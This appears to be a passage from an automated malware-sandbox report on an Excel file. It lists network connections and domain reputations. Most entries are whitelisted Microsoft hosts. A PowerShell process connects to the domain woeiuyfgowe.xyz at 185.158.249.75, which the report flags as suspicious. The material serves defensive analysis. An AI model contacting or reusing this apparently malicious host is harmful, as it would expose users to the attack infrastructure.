3584 | EXCEL.EXE | 52.114.88.20:443 | self.events.data.microsoft.com | Microsoft Corporation | GB | whitelisted |
3584 | EXCEL.EXE | 52.109.32.27:443 | officeclient.microsoft.com | Microsoft Corporation | GB | whitelisted |
300 | powErsHell.exe | 185.158.249.75:443 | woeiuyfgowe.xyz | easystores GmbH | NL | suspicious |
Domain | IP | Reputation |
---|---|---|
login.live.com |
| whitelisted |
self.events.data.microsoft.com |
| whitelisted |
ocsp.digicert.com |
| whitelisted |
config.edge.skype.com |
| whitelisted |
woeiuyfgowe.xyz |
| suspicious |
nexusrules.officeapps.live.com |
| whitelisted |
officeclient.microsoft.com |
| whitelisted |
Process | Message |
---|---|
EXCEL.EXE | 2019-07-17 08:12:23.854 T#1992 <E> [AriaSDK.PAL] PAL is already shutdown!
|